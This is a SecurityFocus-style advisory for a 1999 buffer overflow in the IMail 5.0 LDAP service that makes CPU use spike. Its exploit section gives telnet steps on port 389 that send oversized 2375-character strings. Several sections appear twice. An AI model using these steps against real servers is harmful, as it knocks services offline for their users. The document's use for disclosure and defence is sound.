NT IMail LDAP Buffer Overflow DoS Vulnerability
BID:503
Info
NT IMail LDAP Buffer Overflow DoS Vulnerability
| Bugtraq ID: | 503 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Unknown |
| Local: | Unknown |
| Published: | Mar 01 1999 12:00AM |
| Updated: | Mar 01 1999 12:00AM |
| Credit: | eEye Advisory AD03011999 posted to bugtraq on March 1, 1999 by Marc of eEye <[email protected]>. |
| Vulnerable: |
Ipswitch IMail 5.0 |
| Not Vulnerable: | |
Discussion
NT IMail LDAP Buffer Overflow DoS Vulnerability
The IMail ldap service has an unchecked buffer, resulting in a classic buffer overflow vulnerability. While it does not crash the service, it drives CPU utilization up rendering the system essentially unusable.
The IMail ldap service has an unchecked buffer, resulting in a classic buffer overflow vulnerability. While it does not crash the service, it drives CPU utilization up rendering the system essentially unusable.
Exploit / POC
NT IMail LDAP Buffer Overflow DoS Vulnerability
Telnet to target machine, port 389
Send: Y glob1
hit enter twice
Server Returns: 0
Send: Y glob2
hit enter
Where glob1 and glob2 are 2375 characters and Y is Y. The ldap service goes to 90 percent or so and idles there. Therefore using up most system resources.
Telnet to target machine, port 389
Send: Y glob1
hit enter twice
Server Returns: 0
Send: Y glob2
hit enter
Where glob1 and glob2 are 2375 characters and Y is Y. The ldap service goes to 90 percent or so and idles there. Therefore using up most system resources.
Solution / Fix
NT IMail LDAP Buffer Overflow DoS Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
NT IMail LDAP Buffer Overflow DoS Vulnerability
References:
References: